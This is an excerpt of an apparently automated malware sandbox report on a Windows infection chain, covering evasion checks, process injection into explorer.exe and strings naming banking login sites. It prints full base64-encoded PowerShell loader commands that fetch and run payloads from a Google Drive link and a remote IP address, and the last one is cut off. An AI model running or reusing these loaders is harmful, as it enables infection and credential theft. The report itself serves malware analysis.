              Source: C:\Windows\SysWOW64\explorer.exe TID: 7308Thread sleep count: 52 > 30
              Source: C:\Windows\SysWOW64\explorer.exe TID: 7308Thread sleep time: -52000s >= -30000s
              Source: C:\Windows\explorer.exe TID: 4064Thread sleep count: 48 > 30
              Source: C:\Windows\explorer.exe TID: 4064Thread sleep time: -48000s >= -30000s
              Source: C:\Windows\SysWOW64\explorer.exe TID: 6032Thread sleep count: 39 > 30
              Source: C:\Windows\SysWOW64\explorer.exe TID: 6032Thread sleep time: -39000s >= -30000s
              Source: C:\Windows\explorer.exe TID: 4560Thread sleep count: 44 > 30
              Source: C:\Windows\explorer.exe TID: 4560Thread sleep time: -44000s >= -30000s
              Source: C:\Windows\explorer.exeLast function: Thread delayed
              Source: C:\Windows\explorer.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
              Source: C:\Windows\explorer.exeLast function: Thread delayed
              Source: C:\Windows\explorer.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
              Source: C:\Windows\explorer.exeLast function: Thread delayed
              Source: C:\Windows\explorer.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_02972B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,19_2_02972B15
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_02973ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,19_2_02973ED9
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_02971D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,19_2_02971D4A
              Source: C:\Windows\explorer.exeCode function: 20_2_00FD30A8 FindFirstFileW,FindNextFileW,FindClose,20_2_00FD30A8
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 21_2_0320255C lstrcatW,PathAppendW,FindFirstFileW,RtlZeroMemory,lstrcatW,PathAppendW,lstrcatW,PathAppendW,StrStrIW,FindNextFileW,FindClose,21_2_0320255C
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_02C214D8 wsprintfW,FindFirstFileW,wsprintfW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,22_2_02C214D8
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_02C213FE wsprintfW,FindFirstFileW,wsprintfW,RemoveDirectoryW,FindNextFileW,FindClose,22_2_02C213FE
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_02C215BE RtlZeroMemory,SHGetSpecialFolderPathW,lstrcatW,PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,PathCombineW,PathMatchSpecW,PathCombineW,FindNextFileW,FindClose,22_2_02C215BE
              Source: C:\Windows\explorer.exeCode function: 23_2_00A01DB0 FindFirstFileW,FindNextFileW,FindClose,23_2_00A01DB0
              Source: C:\Windows\explorer.exeCode function: 23_2_00A01EB4 FindFirstFileW,FindNextFileW,FindClose,23_2_00A01EB4
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_02976512 GetSystemInfo,19_2_02976512
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\wihaduvThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
              Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\
              Source: 5E92.tmp.19.drBinary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
              Source: 5E92.tmp.19.drBinary or memory string: tasks.office.comVMware20,11696501413o
              Source: 5E92.tmp.19.drBinary or memory string: trackpan.utiitsl.comVMware20,11696501413h
              Source: 5E92.tmp.19.drBinary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
              Source: 5E92.tmp.19.drBinary or memory string: dev.azure.comVMware20,11696501413j
              Source: explorer.exe, 0000000E.00000000.1755609685.00000000095B9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 1efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: explorer.exe, 0000000E.00000000.1754609723.00000000094DC000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
              Source: 5E92.tmp.19.drBinary or memory string: Interactive userers - COM.HKVMware20,11696501413
              Source: explorer.exe, 0000000E.00000000.1755609685.00000000095B9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}?
              Source: powershell.exe, 00000001.00000002.1451121837.00000000074FE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1455036868.00000000082E4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1754609723.000000000952D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.2014590049.0000000002D4D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: 5E92.tmp.19.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696501413
              Source: explorer.exe, 0000000E.00000000.1754609723.00000000093B4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
              Source: powershell.exe, 00000003.00000002.1326423654.0000000005196000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
              Source: 5E92.tmp.19.drBinary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
              Source: 5E92.tmp.19.drBinary or memory string: turbotax.intuit.comVMware20,11696501413t
              Source: explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
              Source: 5E92.tmp.19.drBinary or memory string: Interactive userers - HKVMware20,11696501413]
              Source: explorer.exe, 0000000E.00000000.1748502813.0000000000889000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000o;
              Source: powershell.exe, 00000001.00000002.1455036868.00000000082E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_C[%=
              Source: explorer.exe, 0000000E.00000000.1755609685.00000000095B9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTbrVMWare
              Source: 5E92.tmp.19.drBinary or memory string: ms.portal.azure.comVMware20,11696501413
              Source: 5E92.tmp.19.drBinary or memory string: www.interactiveuserers.comVMware20,11696501413}
              Source: explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&00000
              Source: 5E92.tmp.19.drBinary or memory string: microsoft.visualstudio.comVMware20,11696501413x
              Source: 5E92.tmp.19.drBinary or memory string: outlook.office365.comVMware20,11696501413t
              Source: explorer.exe, 0000000E.00000000.1754609723.00000000094DC000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: %SystemRoot%\system32\mswsock.dlldRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
              Source: 5E92.tmp.19.drBinary or memory string: interactiveuserers.comVMware20,11696501413
              Source: explorer.exe, 0000000E.00000000.1755609685.00000000095B9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
              Source: explorer.exe, 0000000E.00000003.2160994269.0000000002FBF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: 5E92.tmp.19.drBinary or memory string: AMC password management pageVMware20,11696501413
              Source: powershell.exe, 00000003.00000002.1326423654.0000000005196000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
              Source: 5E92.tmp.19.drBinary or memory string: netportal.hdfcbank.comVMware20,11696501413
              Source: 5E92.tmp.19.drBinary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
              Source: 5E92.tmp.19.drBinary or memory string: bankofamerica.comVMware20,11696501413x
              Source: 5E92.tmp.19.drBinary or memory string: Canara Transaction PasswordVMware20,11696501413}
              Source: explorer.exe, 0000000E.00000000.1754609723.00000000093B4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 2VMware Virtual USB MouseJC:\Windows\System32\DDORes.dll,-2212
              Source: 5E92.tmp.19.drBinary or memory string: Canara Transaction PasswordVMware20,11696501413x
              Source: powershell.exe, 0000000A.00000002.1747767274.000000000715C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: 5E92.tmp.19.drBinary or memory string: outlook.office.comVMware20,11696501413s
              Source: 5E92.tmp.19.drBinary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
              Source: explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: )d2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: explorer.exe, 0000000E.00000000.1748502813.0000000000889000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000/;
              Source: explorer.exe, 0000000E.00000000.1755609685.00000000095B9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
              Source: explorer.exe, 00000013.00000002.2014590049.0000000002D25000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWZ
              Source: wscript.exe, 00000007.00000002.1416665051.0000000004EF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: 5E92.tmp.19.drBinary or memory string: account.microsoft.com/profileVMware20,11696501413u
              Source: powershell.exe, 00000003.00000002.1326423654.0000000005196000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
              Source: 5E92.tmp.19.drBinary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
              Source: 5E92.tmp.19.drBinary or memory string: Interactive userers - EU WestVMware20,11696501413n
              Source: 5E92.tmp.19.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413
              Source: 5E92.tmp.19.drBinary or memory string: interactiveuserers.co.inVMware20,11696501413d
              Source: 5E92.tmp.19.drBinary or memory string: global block list test formVMware20,11696501413
              Source: 5E92.tmp.19.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
              Source: powershell.exe, 00000001.00000002.1451121837.00000000074FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWd-
              Source: 5E92.tmp.19.drBinary or memory string: discord.comVMware20,11696501413f
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSystem information queried: ModuleInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSystem information queried: CodeIntegrityInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess queried: DebugPort
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 13_2_00402920 LdrLoadDll,13_2_00402920
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_02C216C7 GetCurrentProcessId,GetCurrentThreadId,CreateToolhelp32Snapshot,Thread32First,OpenThread,SuspendThread,ResumeThread,CloseHandle,Thread32Next,CloseHandle,22_2_02C216C7
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_029D9247 LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,19_2_029D9247
              Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_02971011 GetProcessHeap,RtlFreeHeap,19_2_02971011
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\AppData\Roaming\wihaduvMemory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Windows\explorer.exeFile created: wihaduv.14.drJump to dropped file
              Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 45.91.8.152 80
              Source: Yara matchFile source: amsi32_7848.amsi.csv, type: OTHER
              Source: Yara matchFile source: amsi32_6124.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6124, type: MEMORYSTR
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4ICggKCgnaHl4aW1hZ2VVcmwgPSBRTGVodHRwczovL2RyaXZlLmdvbycrJ2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciBRTGU7aHl4d2ViQ2xpZW50ID0gTmV3LU9iJysnamVjdCAnKydTeXN0ZScrJ20uTmV0LldlYkNsaWUnKydudDtoeXhpbWFnZUJ5dGVzID0gaHl4d2ViQ2xpZW50LkRvdycrJ25sb2FkRCcrJ2F0YShoeXhpbWFnZVVybCk7aHl4aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoaHl4aW1hZ2VCeXRlcyk7aHl4c3RhcnRGbGFnID0gUUxlPDxCQVNFNicrJzRfU1RBUlQ+PlFMZTtoeXhlbmRGbGFnID0gUUxlPDxCQVNFNjRfRU5EPj5RTGU7aHl4c3RhcnRJbmRleCA9IGh5eGltJysnYWdlVGV4dC5JbmRleE9mKGh5eHN0YXJ0RmxhZyk7aHl4ZW5kSW5kZXggPSBoeXhpbWFnZVRleHQuSW5kZXhPZihoeXhlbmRGbGFnKTtoeXhzdGFydEluZGV4IC1nZSAwIC1hbmQgaHl4ZW5kSW5kZXggLWd0IGh5eHN0YXJ0SW5kZXg7aHl4c3RhcnRJbmRleCArPSBoeXhzdGFydEZsYWcuTGVuZ3RoO2h5eGJhc2U2NExlbmd0aCA9IGh5eGVuZEknKyduZGV4IC0gaHl4c3RhcnRJbmRleDtoeXhiJysnYXNlNjRDb21tYW5kID0gaHl4aW1hZ2VUZXh0LlN1YnN0cmluZyhoeXhzdGFydEluZGV4LCBoeXhiYXNlNjRMZW5ndGgpO2h5eGJhc2U2NFJldmVyc2VkID0gLWpvaW4gKGh5eGJhJysnc2U2NENvbW1hbmQuVG9DaGEnKydyQXJyYXkoKSBWSjkgRm9yRWFjaC1PYmplY3QgeyBoeXhfIH0pWy0xJysnLi4tKGh5eGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07aHl4Y29tbWFuZEJ5dCcrJ2VzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhoeXhiYXNlNjRSZXZlcnNlZCk7aHl4bG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHknKyddOjpMb2FkKCcrJ2h5eGNvbW1hbmRCeXRlJysncyk7aHl4dmFpTWV0aG9kID0gW2QnKydubGliLklPLkhvbWVdLkdldE1ldGgnKydvZChRTGVWQUlRTGUpO2h5eHZhaU1ldGhvZC5JbnZva2UoaHl4bnVsbCwgQChRTGV0eHQuRUVDRlJFLzAwNi82NjEuNTMxLjU0Mi4yNzEvLzpwdHRoUUxlLCBRTGVkZXNhdGl2YWRvUUxlLCBRTGVkZXNhdGl2YWQnKydvUUxlJysnLCBRTGVkZXNhdGl2YWRvUUxlLCBRTGVhc3AnKyduZXRfcmVnYnJvd3NlcnNRTGUsIFFMZWRlc2F0aXZhZG9RTGUsIFFMZWRlc2F0aXZhZG9RTGUsUUxlZGVzYXRpdmFkb1FMZSxRTGVkZXNhdGl2YWRvUUxlLFFMZWRlJysnc2F0JysnaXZhZG9RTGUsUUxlZGVzYXRpJysndmFkb1FMZSxRTGVkZXNhdGl2YWRvUUxlLFFMZTFRTGUsUUxlZGVzYXRpdmFkb1FMZSkpOycpLWNyRXBMQUNFICAoW2NoQXJdMTA0K1tjaEFyXTEyMStbY2hBcl0xMjApLFtjaEFyXTM2ICAtckVQTGFDZShbY2hBcl04MStbY2hBcl03NitbY2hBcl0xMDEpLFtjaEFyXTM5IC1yRVBMYUNlJ1ZKOScsW2NoQXJdMTI0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeThread created: C:\Windows\explorer.exe EIP: 2491960
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Windows\explorer.exeMemory written: PID: 2288 base: 4179C0 value: 90
              Source: C:\Windows\explorer.exeMemory written: PID: 2312 base: 7FF60A072D10 value: 90
              Source: C:\Windows\explorer.exeMemory written: PID: 2796 base: 4179C0 value: 90
              Source: C:\Windows\explorer.exeMemory written: PID: 2936 base: 4179C0 value: 90
              Source: C:\Windows\explorer.exeMemory written: PID: 4232 base: 7FF60A072D10 value: 90
              Source: C:\Windows\explorer.exeMemory written: PID: 3108 base: 4179C0 value: 90
              Source: C:\Windows\explorer.exeMemory written: PID: 4072 base: 7FF60A072D10 value: 90
              Source: C:\Windows\explorer.exeMemory written: PID: 6160 base: 4179C0 value: 90
              Source: C:\Windows\explorer.exeMemory written: PID: 4576 base: 7FF60A072D10 value: 90
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read write
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 400000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 401000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: A82008Jump to behavior
              Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4179C0
              Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4179C0
              Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4179C0
              Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4179C0
              Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4179C0
              Source: C:\Windows\SysWOW64\explorer.exeCode function: RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep, explorer.exe30_2_00151016
              Source: C:\Windows\SysWOW64\explorer.exeCode function: wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep, explorer.exe30_2_001510A5
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTEM32\wIndowSpOWersHELl\v1.0\powerShELl.ExE" "pOWErSHell -Ex BypAsS -nOp -w 1 -c dEvicECrEDeNtIaldePLoyMenT.EXe ; iex($(IeX('[systEm.TeXt.eNcoDINg]'+[CHaR]58+[Char]0X3a+'utf8.geTsTRinG([sySteM.COnvErT]'+[CHar]58+[cHAr]58+'frOMBaSE64StRING('+[cHaR]34+'JDVnZ0U5NiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRW1iRXJERUZJbmlUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXUnQsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3d3osc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRXdqWU8sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcVN5cHZwZixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9vUGdpWGNPayk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJyIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWNremRUWnd6ZCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDVnZ0U5Njo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTM1LjE2Ni82MDAvc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbnN0b2ViZS50SUYiLCIkZU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMiLDAsMCk7c1RBUnQtc0xlRVAoMyk7c1RBcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMi'+[cHAr]34+'))')))"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BypAsS -nOp -w 1 -c dEvicECrEDeNtIaldePLoyMenT.EXeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zrs0mlof\zrs0mlof.cmdline"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthign.vbS" Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES611F.tmp" "c:\Users\user\AppData\Local\Temp\zrs0mlof\CSC43C4496BB9344E76B253EEAECE3B141.TMP"Jump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4ICggKCgnaHl4aW1hZ2VVcmwgPSBRTGVodHRwczovL2RyaXZlLmdvbycrJ2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciBRTGU7aHl4d2ViQ2xpZW50ID0gTmV3LU9iJysnamVjdCAnKydTeXN0ZScrJ20uTmV0LldlYkNsaWUnKydudDtoeXhpbWFnZUJ5dGVzID0gaHl4d2ViQ2xpZW50LkRvdycrJ25sb2FkRCcrJ2F0YShoeXhpbWFnZVVybCk7aHl4aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoaHl4aW1hZ2VCeXRlcyk7aHl4c3RhcnRGbGFnID0gUUxlPDxCQVNFNicrJzRfU1RBUlQ+PlFMZTtoeXhlbmRGbGFnID0gUUxlPDxCQVNFNjRfRU5EPj5RTGU7aHl4c3RhcnRJbmRleCA9IGh5eGltJysnYWdlVGV4dC5JbmRleE9mKGh5eHN0YXJ0RmxhZyk7aHl4ZW5kSW5kZXggPSBoeXhpbWFnZVRleHQuSW5kZXhPZihoeXhlbmRGbGFnKTtoeXhzdGFydEluZGV4IC1nZSAwIC1hbmQgaHl4ZW5kSW5kZXggLWd0IGh5eHN0YXJ0SW5kZXg7aHl4c3RhcnRJbmRleCArPSBoeXhzdGFydEZsYWcuTGVuZ3RoO2h5eGJhc2U2NExlbmd0aCA9IGh5eGVuZEknKyduZGV4IC0gaHl4c3RhcnRJbmRleDtoeXhiJysnYXNlNjRDb21tYW5kID0gaHl4aW1hZ2VUZXh0LlN1YnN0cmlu